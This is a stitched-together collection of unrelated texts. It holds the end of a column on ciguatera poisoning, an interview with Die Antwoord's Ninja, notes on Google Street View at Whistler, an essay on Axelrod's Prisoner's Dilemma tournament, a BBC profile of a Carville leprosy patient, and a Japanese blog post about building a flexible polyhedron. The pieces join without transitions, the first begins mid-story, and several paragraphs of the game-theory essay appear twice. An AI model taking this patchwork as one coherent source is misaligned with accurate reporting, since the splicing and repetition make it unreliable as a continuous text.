But how did he know ?
It was easy , Dr. Ma told his doctor - teachers .
He took care of a family with ciguatera poisoning several months earlier .
A whole family had eaten barracuda for their Christmas dinner .
They came to the hospital a few hours later , after the nausea , vomiting and diarrhea had given way to these strange neurological problems .
He ’d never forget them .
Dr. Ma went back to the patient ’s room .
He apologized for his unexpected exit and began to explain the illness and where it had come from .
Although the pathology of this poison is still not well understood , current thinking is that the toxin damages the protective sheath covering the nerves , causing the sheath to swell and compress the delicate tissue it ’s supposed to protect .
“ Even before they told me , I knew it had to be the fish — the barracuda , ” the patient told me sadly .
Barracuda has recently been identified as a common source of the toxin , and the C.D.C. now advises against eating the fish , especially when it ’s been caught in the Caribbean .
These days ciguatera is not just a tropical threat .
In the U.S. , it has become one of the most common fish - related illnesses as the waters off the coasts of Florida , Texas , South Carolina and most recently North Carolina become warm enough to host these once tropical organisms .
It has been more than six months since the patient returned from the Caribbean , and he still has not fully recovered .
He can eat again — he lost 20 pounds in the first few weeks of the illness .
He still has occasional numbness and weakness .
The patient sighed : “ And it was such good fish too .
I ate a lot of it . ”
The South African rap - rave internet star known as The Ninja grabs my face by the cheeks .
He leans forward and stares into my eyes , like a large savannah predator about to inhale a hamster .
" And that 's what I did to Jimmy Iovine , " he says .
" He did n't seem to like it , but nobody told me it was n't cool to do that .
And then I kissed him on each cheek , because we were making a deal like you do with the mafia .
Die Antwoord is in business with Interscope now . "
It 's been just over a month since a friend emailed me a link to their music , and I blogged here on Boing Boing .
They had fans before , but what exploded in these past four weeks is the stuff labels and artists dream of : Die Antwoord became a living meme of unprecedented velocity , propelled into global megawebstardom faster than any act I 've ever seen .
Ninja tells me that in addition to shaking hands with Interscope , District 9 helmer Neill Blomkamp plans to direct Antwoord 's next music video , they 'll likely be performing at the Coachella festival , and a film is in the works .
I 'm in a diner in Hollywood with my friend Sean Bonner early Friday morning , and we 're eating breakfast with the Ninja .
Between bursts of rapid - fire recollections , he stares at his granola for meditative pause : an Afrikaans astronaut hit by vertigo ; a recently broke and obscure artist punched in the face by the the full force of fame .
" I 'm not skinny like this by choice , " he says , huddled over the table in a Ren and Stimpy hoodie adorned with John Kricfalusi doodles .
" We had no money forever .
Now , we 're flying business class to America , and look at me , I 'm eating berries and granola in Hollywood . "
He says Die Antwoord is in LA for the first time .
He 's joined by his creative partner Yolandi Visser ( who 's sleeping in this morning , upstairs in the hotel ) , and their " consigliere " Jay .
" When we did the big meeting with Interscope , Jimmy Iovine was telling me all about how badly their business has been harmed by the internet , " Ninja says , sipping black coffee . " I can understand that but I said , ' Jimmy , I want to give you a piece of samurai advice : Become the enemy . "
The band 's forthcoming debut album $ O$ , streaming in entirety on their website for free , is the first of 5 albums they plan to release .
A sort of documentary film is in the works , too .
" It 's like an hour - long introduction to a music video , like Thriller , only you can eat popcorn while you watch it at the cinema , " he says .
After breakfast , they 're off to meet one of their creative heroes , director and high weirdness curator David Lynch .
" I used to smoke a lot of weed , " Ninja says .
" Then I got my hands on a David Lynch Twin Peaks box set , and I watched the whole thing in one sitting , and it blew my mind .
Special Agent Dale Cooper said something about pot being bad for you , and that convinced me that maybe I should n't smoke pot anymore .
All of this now might be a little harder to take if I were . "
Die Antwoord have been eagerly courted by many in the Hollywood power elite during this first brief trip to LA .
" I do n't understand how it happened any more than they do , but I understand how rare it is , " he says .
And he 's right : labels spend millions of dollars trying to create what happened to them .
Fans have swarmed at every turn during their LA trip : this in a town where more conventional celebrity spottings are commonplace .
A brief club appearance — " just me busting out one long rap - rave rhyme , " says Ninja — turned into full - on moshpit hysteria , with underground music blogs describing the event as Antwoord 's debut US performance , a carefully planned secret show .
" It was n't , this is all crazy , " he says .
" The funniest thing has been the people on the internet angry that we were ' fake . '
The only people who thought we were some kind of hoax were from the US and the EU .
This is just real , it 's who we are . "
Ninja and Yolandi have long been fans of photographer ( and onetime geology student ) Roger Ballen , best known for his disturbing black and white portraits of South African mining town residents .
When fame hit , they emailed their idol , and he agreed to shoot the $ O$ album cover .
" The art you see in our videos , on the clothing , the tattoos , everything — a lot of that is also inspired by the art of children , and the criminally insane , " says Ninja .
" They do n't have that hard barrier between their conscious and subconscious minds , the creativity and fluid consciousness inspires me . "
He cites other influences as diverse as William Gibson 's novel Neuromancer , the rapper Eminem , science fiction movies , and the toy company Friends With You .
I ask about Leon Botha , an enigmatic figure who appears in some of the band 's videos — Botha is 24 , and has Progeria , a disease that often takes the lives of its victims at a far earlier age .
" We met at a DJ Qbert concert in South Africa and Leon was in the front , rocking out , " Ninja recalls .
They became friends and creative kindred spirits .
" When you 're hanging around him , it 's like you 're hearing the voice of God , he 's so present and immediate , " he says .
" He 's a beautiful soul , " I say .
We 've swapped a few emails , and I was mesmerized by Botha 's YouTube video monologues .
" We all are , " says Ninja , " It 's just that he 's right there on the surface .
He , more than anyone else I know , lives in the moment , because he know he could die the next .
I mean , we all could die .
You could , Xeni , I could take you out right now — BAM ! "
His hand becomes a pretend - gun , and he shoots me pretend - dead .
" Haha !
Just kidding .
But he is aware of death , and of the preciousness of the present .
And that 's where the creative power is . "
I remind him of the day Die Antwoord burst into dominance on Google Trends : February 3rd , 2010 , some 48 hours after that first Boing Boing post .
" February 3rd was already a date I remembered , " he replies .
" My younger brother , his nickname was ' Boo , ' he committed suicide 7 years ago on that day . "
" This the only thing I can do , I ca n't do anything else , " he continues .
" It is what I love , and all I have ever wanted to do in my life .
Now that all of this — " ( he gestures toward Hollywood Boulevard , as a truck carrying leftover Academy Awards props cruises by ) " — now that this is happening to us , it 's overwhelming because you also realize that it could disappear right away . "
" I do n't know what that 's going to mean .
But for now , I just know that we have a film to make , and albums to record , and shows to play . "
" It 's not bad . "
# # #
The A - Z of Awesomeness is an absolutely stunning project by Neill Cameron .
Based on suggestions from his followers , he created incredible illustrations for every single letter of the alphabet in 26 days .
What does it take to chronicle the slopes of Canada 's mountains for Google Street View ?
A dash of ingenuity , a little MacGyvering and the ability to have some fun along the way .
Google 's Street View team shot the slopes at Canada 's Whistler Blackcomb ski resort with a tricked out snowmobile .
They equipped the snowmobile with a Street View camera system that was pulled together using duct tape , and extra hard drives .
They also mounted the cameras on SUVs to drive on the snow - covered roads .
The results are impressive :
You can stand on top of a mountain , exactly where skiers will be starting their runs , and " ski " downhill from there , viewing relatively high - resolution images the whole way .
The little Street View man even turns into a skier in the Street View interface .
" The motivation to really get this project going was you have to the upcoming 2010 Olympics here and we wanted to try and capture some beautiful imagery so everyone can experience what it is really like to be up on the slopes , " says Daniel Ratner , senior mechanical engineer at Google in the video below .
Google 's Street View team has been fairly creative in its efforts to capture the details of all terrain .
Last year , they mounted cameras on a tricycle to gain access to places in Britain that cars can’t reach such as coastal paths and sports arenas .
Google 's Street View blog offers a nice behind - the - scenes look at how the view from the snowmobile translated into the 3 - D view for Google maps .
See Also :
Photos : Google Blog
We live in a world with other people .
Almost every decision we make involves someone else in one way or another , and we face a constant choice regarding just how much we ’re going to trust the person on the other side of this decision .
Should we take advantage of them , go for the quick score and hope we never see them again – or should we settle for a more reasonable reward , co-operating in the hope that this peaceful relationship will continue long into the future ?
We see decisions of this type everywhere , but what is less obvious is the best strategy for us to use to determine how we should act .
The Golden Rule states that one should “ do unto others as you would have them do unto you ” .
While it seems rather naive at first glance , if we run the numbers , we find something quite amazing .
A Dilemma
In order to study these types of decisions , we have to define what exactly we ’re talking about .
Let ’s define just what a “ dilemma ” is .
Let ’s say it has two people – and they can individually decide to work together for a shared reward , or screw the other one over and take it all for themselves .
If you both decide to work together , you both get a medium - sized reward .
If you decide to take advantage of someone but they trust you , you ’ll get a big reward ( and the other person gets nothing ) .
If you ’re both jerks and decide to try to take advantage of each other , you both get a tiny fraction of what you could have .
Let ’s call these two people Alice and Bob – here ’s a table to make things a bit more clear .
Alice cooperates Alice defects Bob cooperates Everyone wins !
A medium - sized reward to both for mutual co-operation Poor Bob .
He decided to trust Alice , who screwed him and got a big reward .
Bob gets nothing .
Bob defects Poor Alice .
She decided to trust Bob , who took advantage of her and got a big reward .
Alice gets nothing .
No honour among thieves … both Bob and Alice take the low road , and fight over the scraps of a small reward .
This specific order of rewards is referred to as the Prisoner ’s Dilemma , and was formalized and studied by Melvin Dresher and Merrill Flood in 1950 while working for the RAND Corporation .
Sale , One Day Only !
Now of course the question is – if you ’re in this situation , what is the best thing to do ?
First suppose that we ’re never , ever going to see this other person again .
This is a one time deal .
Absent any moral consideration , your best option for the most profit is to attempt to take advantage of the other person and hope that they are clueless enough to let you , capitalism at its finest .
You could attempt to cooperate , but that leaves you open to the other party screwing you .
If each person acts in their own interest and is rational , they will attempt to one - up the other .
But there ’s just one problem – if both people act in this way , they both get much less than they would if they simply cooperated .
This seems very strange , as the economic models banks and other institutions use to model human behavior assume this type of logic – the model of the rational consumer .
But this leads to nearly the worst possible option if both parties take this approach .
It seems that there is no clear ideal strategy for a one time deal .
Each choice leaves you open to possible losses in different ways .
At this point it ’s easy to toss up your hands , leave logic behind , and take a moral stance .
You ’ll cooperate because you ’re a good person – or you ’ll take advantage of the suckers because life just is n’t fair .
And this appears to leave us where we are today – some good people , some bad people , and the mythical invisible hand of the market to sort them all out .
But there ’s just one little issue .
We live in a world with reputations , with friends , and with foes – there are no true “ one time ” deals .
The world is small , and people remember .
In it for the Long Run
So instead of thinking of a single dilemma , let ’s think about what we should do if we get to play this game more than once .
If someone screws you in the first round , you ’ll remember – and probably wo n’t cooperate the next time .
If you find someone who always cooperates , you can join them and work together for your mutual benefit – or decide that they ’re an easy mark and take them for everything they ’ve got .
But what is the best strategy ?
In an attempt to figure this out , in 1980 Robert Axelrod decided to have a contest .
He sent the word out , and game theorists , scientists , and mathematicians all submitted entries for a battle royale to determine which strategy was the best .
Each entry was a computer program designed with a specific strategy for playing this dilemma multiple times against other clever entries .
The programs would play this simple dilemma , deciding whether to cooperate or defect against each other , for 200 rounds .
Five points for a successful deception ( you defect , they cooperate ) , three points each for mutual cooperation , one point each if you both tried to screw each other ( mutual defection ) , and no points if you were taken advantage of ( you cooperate , they defect ) .
Each program would play every other program as well as a copy of itself , and the program with the largest total score over all the rounds would win .
So what would some very simple programs be ?
ALL - C ( always cooperate ) is just like it sounds .
Cooperation is the only way , and this program never gets tired of being an upstanding guy .
ALL - D ( always defect ) is the counterpoint to this , and has one singular goal .
No matter what happens , always , always , always try to screw the other person over .
RAND is the lucky dunce – do n’t worry too much , just decide to cooperate or defect at random .
You can predict how these strategies might do if they played against each other .
Two ALL - C strategies would endlessly cooperate in a wonderful dance of mutual benefit .
Two ALL - D strategies would continually fight , endlessly grinding against each other and gaining little .
ALL -C pitted against ALL - D would fare about as well as a fluffy bunny in a den of wolves – eternally cooperating and hoping for reciprocation , but always getting the shaft with ALL - D profiting .
So an environment of ALL - C would be a cooperative utopia – unless a single ALL - D strategy came in , and started bleeding them dry .
But an environment entirely made of ALL - D would be a wasteland – no one would have any success due to constant fighting .
And the RAND strategy is literally no better than a coin flip .
Time to Think
So what should we do ?
Those simple strategies do n’t seem to be very good at all .
If we think about it however , there ’s a reason they do so poorly – they do n’t remember .
No matter what the other side does , they ’ve already made up their minds .
Intelligent strategies remember previous actions of their opponents , and act accordingly .
The majority of programs submitted to Axelrod ’s competition incorporated some sort of memory .
For instance , if you can figure out you ’re playing against ALL -C , it ’s time to defect .
Just like in the real world , these programs tried to figure out some concept of “ reputation ” that would allow them to act in the most productive manner .
And so Axelrod ’s competition was on .
Programs from all over the world competed against each other , each trying to maximize their personal benefit .
A wide variety of strategies were implemented from some of the top minds in this new field .
Disk drives chattered , monitors flickered , and eventually a champion was crowned .
And the Winner Is …
When the dust settled , the winner was clear – and the victory was both surprising and inspiring .
The eventual champion seemed to be a 90 lb weakling at first glance , a mere four lines of code submitted by Anatol Rapoport , a mathematical psychologist from the University of Toronto .
It was called “ Tit - for - Tat ” , and it did exactly that .
It started every game by cooperating – and then doing exactly what the other player did in their last turn .
It cooperated with the “ nice ” strategies , butted heads with the “ mean ” strategies , and managed to come out on top ahead of far more complex approaches .
The simplest and shortest strategy won , a program that precisely enforced the Golden Rule .
But what precisely made Tit - for - Tat so successful ?
Axelrod analyzed the results of the tournament and came up with a few principles of success .
Do n’t get greedy .
Tit - for - Tat can never beat another strategy .
But it never allows itself to take a beating , ensuring it skips the brutal losses of two “ evil ” strategies fighting against each other .
It actively seeks out win -win situations instead of gambling for the higher payoff .
Tit - for - Tat can never beat another strategy .
But it never allows itself to take a beating , ensuring it skips the brutal losses of two “ evil ” strategies fighting against each other .
It actively seeks out win -win situations instead of gambling for the higher payoff .
Be nice .
The single best predictor of whether a strategy would do well was if they were never the first to defect .
Some tried to emulate Tit - for - Tat but with a twist – throwing in the occasional defection to up the score .
It did n’t work .
The single best predictor of whether a strategy would do well was if they were never the first to defect .
Some tried to emulate Tit - for - Tat but with a twist – throwing in the occasional defection to up the score .
It did n’t work .
Reciprocate , and forgive .
Other programs tended to cooperate with Tit - for - Tat since it consistently rewarded cooperation and punished defection .
And Tit - for - Tat easily forgives – no matter how many defections it has seen , if a program decides to cooperate , it will join them and reap the rewards .
Other programs tended to cooperate with Tit - for - Tat since it consistently rewarded cooperation and punished defection .
And Tit - for - Tat easily forgives – no matter how many defections it has seen , if a program decides to cooperate , it will join them and reap the rewards .
Do n’t get too clever .
Tit - for - Tat is perfectly transparent , and it becomes obvious that it is very , very difficult to beat .
There are no secrets , and no hypocrisy – Tit - for - Tat gets along very well with itself , unlike strategies biased toward deception .
The contest attracted so much attention that a second one was organized , and this time every single entry was aware of the strategy and success of Tit - for - Tat .
Sixty - three new entries arrived , all gunning for the top spot .
And once again , Tit - for - Tat rose to the top .
Axelrod used the results of these tournaments to develop ideas about how cooperative behaviour could evolve naturally , and eventually wrote a bestselling book called The Evolution of Cooperation .
But his biggest accomplishment may be showing us that being nice does pay off – and giving us the numbers to prove it .
Mr Pete was diagnosed with leprosy at the age of five
Vanessa Buschschluter
BBC News , Louisiana
For almost six decades , Simeon Peterson - or Mr Pete as he likes to be known - has called the National Leprosarium in Carville , Louisiana , home .
He is one of the 6,500 people in the US , who suffer from leprosy or the effects of the disease .
The small , thin man , looking dapper in his black hat , shirt and braces , has braved a torrential downpour to cycle to the former plantation mansion at the centre of the leprosarium , to tell me about his life in what until 1921 was known as the Louisiana Leper Home .
As he peels off his black wool gloves , the toll leprosy has taken on him is clearly visible .
He may only have three fingers left on his right hand , but his handshake is firm .
Unable to feel pain , patients repeatedly injure their fingers and toes " I was diagnosed with leprosy when I was five , " he says .
Then he corrects himself and says : " Hansen 's Disease .
I was diagnosed with Hansen 's Disease . "
Leprosy is a chronic infectious disease that attacks skin , peripheral nerves and mucous membranes .
It is one of the most feared infectious diseases and the stigma surrounding it goes back to Biblical times .
So it comes as little surprise that when Norwegian doctor Gerhard Armauer Hansen discovered the bacterium that causes leprosy ( Mycobacterium leprae ) , many patients and doctors were keen to switch to its new clinical name : Hansen 's Disease ( HD ) .
Having lived with the disease for most of his life , Mr Pete is more than familiar with both terms .
He tells me his brother and sister were also diagnosed with HD .
Where they got it from , he does not know .
Between 150-200 people in the US are diagnosed with HD every year .
But , to this day , leprosy remains one of the least understood infectious diseases .
The most commonly accepted theory is that it is transmitted through the sneezes and coughs of untreated patients , says Jim Krahenbuhl , director of the National Hansen 's Disease Program .
But contrary to popular belief , it is far less contagious than other infectious diseases .
In fact , more than 95 % of people have a natural immunity to leprosy .
Mr Pete and his siblings are among the 5 % who do not have that immunity .
When he developed a spot on his finger - one of the tell - tale signs of leprosy - he went to the local hospital on his island home of St Croix on the US Virgin Islands .
The hospital housed a number of leprosy patients , but offered no effective treatment .
So , when in 1951 a doctor from the only leprosarium in the continental United States came to visit and offered the patients the chance to go to Carville , he and 18 others took it .
HISTORY OF CARVILLE
In 1894 , an abandoned plantation in Louisiana becomes the only leprosy colony in the continental US
The first patients were put on a barge from New Orleans at midnight and sent up the Mississippi to Carville The US Public Health Service took over in 1921 Doctors there later developed an effective treatment for HD
In 1999 , the hospital relocated to Baton Rouge
When he arrived at the former sugar plantation on a bend of the Mississippi River , there where more than 400 patients living there .
Most of them had changed their names or were using aliases so as not to cause their families any embarrassment .
Some had been taken to the leprosarium against their will , at a time when isolating patients was believed to be the best way of preventing contagion .
The severity of the leprosy cases at the hospital in Carville differed .
Some patients only had small spots or lesions .
In others , the leprosy bacteria had damaged the nerves in their extremities .
Nerve damage meant patients would lose the sensation in their hands and feet .
Unable to feel pain , they would repeatedly injure their fingers and toes , the damaged bones would become shorter and shorter , resulting in the hallmark deformed hands and feet leprosy is so feared for .
Mr Pete has mixed memories of Carville during that time .
" It was very restrictive , " he says .
" We were n't allowed to leave the grounds .
We had to stay here all the time . "
But , he says , the wire fence surrounding the hospital was no obstacle to him and his fellow patients .
At weekends , they would crawl through a hole in the fence and escape to nearby Baton Rouge to drink and dance the night away .
But they always kept their identities secret .
Mr Pete and his siblings are among the 5 % who do not have immunity " You could n't tell people you were from Carville , them days you could n't do that , they would have got scared , " Mr Pete explains .
" They would have said ' Oh my God , you have leprosy ? ' and called the police for you . ' "
Over the decades , the rules at Carville were relaxed considerably .
In 1941 , 10 patients at the hospital volunteered for treatment with a drug called Promin .
The results after many months of painful intravenous injections with the sulfone drug were described by doctors and patients as miraculous .
It cured leprosy and within weeks it stopped patients from being contagious .
No longer contagious , the people at Carville started to be treated more like patients than prisoners .
In 1946 , they were given the right to vote , which had been denied to them until then .
And slowly , they were allowed to leave the grounds , first on day passes , and later whenever they wanted .
Carville became its own community , and a diverse one at that , with a large number of African - American and Hispanic patients .
They had their own churches , bakeries and post offices .
They married and split up , organised dances , baseball games and Mardi Gras processions .
But , Mr Pete says , it was not exempt from the challenges and problems of the time either , some of which he rebelled against .
" In the theatre , there were two rows of seats for us , the black .
Then there were two rows of seats for the doctors - no patients could sit there , " he remembers .
But he and some other African - American patients started sitting there .
" We 're in prison already , what are you going to do ? " they asked the doctors and nurses .
" And they stopped it .
They may call me a rebel , but so what ?
You make it good for somebody else , " he says and chuckles .
With effective multi-drug treatment in tablet form being developed in the 1970s , fewer and fewer patients needed to stay at the leprosarium and numbers quickly dwindled .
Some elderly patients chose to move to a care home in Baton Rouge , others moved in with their relatives .
But a handful decided to stay in the place that had become their home .
Some patients arrived at Carville in shackles
In 1999 , the hospital relocated to Baton Rouge and Carville was taken over by the National Guard , which runs a training programme for at - risk youth .
Eight former patients still live at the former leprosarium .
Mr Pete says much of the community spirit has disappeared , though .
The patients do not get together like they used to .
" After supper , everybody goes into their rooms and switches on their TV .
I 'm telling you that TV got us , we 're hooked on that TV . "
Mr Pete himself spends one afternoon a week working in the National Hansen 's Disease Program museum as an ambassador , educating visitors about the disease and trying to dispel some of the stigma still associated with it .
He says there are still a few people who are scared when they hear the word leprosy .
" But they 'll get into it , " he says confidently .
He particularly enjoys talking to groups of children that visit the museum on school trips .
" They ask tough questions , they ask me about my hands , but I answer them , " he says proudly .
To him , knowledge about the disease will eventually beat the stigma .
And the earlier you can educate people about it , the better .
" See , you know now , everything is good now .
I 'm doing good , " he tells the children .
Photographs by Phil Coomes
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
■パズルでめぐる奇妙な数学ワールド の第14章の『アコーディオンは「欠陥楽器」か！？』からのネタ。平面図形として三角形は「唯一」の安定した多角形なのだそうである。「安定」とは、辺の長さはそのままで形が変わらないということである。たとえば、長方形は辺の長さはそのままで異なる形になりうる（下図）。では立体ではどうか。辺の長さだけが不変でいいなら直方体は潰れるように形は変わりうることは容易にわかるが、面の形を不変とするならどうだろう。
ほ ぼ200年にわたって、数学者は多面体の安定性やら何やらに悩まされてきた。多面体とは有限個の面を持つもので、面のそれぞれは多角形で、辺を境界にして二つずつがつながっている。従来、三角形の面だけでつくられる多面体はすべて安定していると考えられてきたが、最近になってそれが間違いだとわかった。このあと紹介するように、どの面もほんのわずかでさえ曲げたりゆがめたりすることなく、形状を「自由」に変えられる多面体が存在する。
で、実際にこの多面体の展開図が紹介されていた。面同士が貫通して自由に動ける必要のあるもの（辺のみを針金が作れば実際に作れる）はラウル・プリカールが、面同士が貫通しないものはコネリーが発見した。紹介されてあるのは、クラウス・シュテッフェンが構造を単純化したもので、展開図のキャプションには「シュテッフェンによる形状が変わる多面体」とある。
展開図を見ただけでは、どのような立体になるのか想像がつかない。仕事柄、病院内に待機していなければならないが、特にすることがないという時間もあるわけで、深夜で他の先生方がほとんどいないときを見計らって作ってみた。まずは、展開図を拡大コピーして、厚紙に張り、きれいにハサミで切り取る。
切り取ったあとは、線に従って山折りと谷折りで折り目をつける。辺と辺を接着するのに、のりしろありとのりしろなしの２バージョンつくったが、のりしろなしのほうが仕上がりはきれいになった。どうせ糊ではつきが悪く、結局はセロハンテープを使うことになるので、はじめから全部セロハンテープでつくったほうがまし。できあがりは以下の写真の通り（のりしろなしバージョン）。
少しよがんでいるのはご愛嬌。動かしてみると、確かにペコペコ動く。作りが悪くてたわんでいるだけではないかという気もしなくもないが、まあ少なくとも感じはつかめた。実はこのような多面体は動かしても体積が不変であるそうな。『アコーディオンは「欠陥楽器」か！？』という章のタイトルはそのことに由来する。確かに、動かしてみると、離れる面と面の部分もあれば、近づく面と面の部分もあり、まあ多分体積は一定なんだろうなという気にさせる。面白いのはこの多面体を煙を満たし、形状を変えてみて煙が吐き出されないことを実験で確認した先生がいたこと。もちろん証明にはならないものの、数学の世界にも実験があるのだなあと感心した次第。
追記
別の角度から。凹部分がある。ただ、写真じゃたくさんあってもよく分からんと思う。
